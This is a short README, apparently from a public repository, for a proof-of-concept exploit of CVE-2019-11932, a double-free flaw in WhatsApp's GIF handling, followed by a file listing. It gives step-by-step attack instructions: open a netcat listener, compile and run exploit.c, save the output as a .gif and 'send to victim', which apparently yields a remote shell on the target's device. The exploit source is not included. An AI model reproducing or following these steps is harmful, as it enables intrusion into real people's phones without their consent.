Double-Free BUG in WhatsApp exploit poc.# CVE-2019-11932
Double-Free BUG in WhatsApp exploit poc.
## Usage
```bash
bash create.sh
```
## clone on replit and run
[](https://replit.com/github/tucommenceapousser/CVE-2019-11932)
## Manually
```bash
nc -lvp 5555 or whatever port.
```
and then compile.
```
gcc -o exp egif_lib.c exploit.c
```
then run
```bash
./exp
```
and save the content to .gif
and send to victim.
[4.0K] /data/pocs/911a0a7d460111acdcdfc407f96b5279ca5150f4
├── [ 800] create.sh
├── [3.3K] egif_lib.c
├── [5.2K] exploit.c
├── [ 11K] gif_lib.h
├── [1.2K] LICENSE
├── [ 42] MakeFile
├── [ 461] README.md
└── [ 81] replit.nix
0 directories, 8 files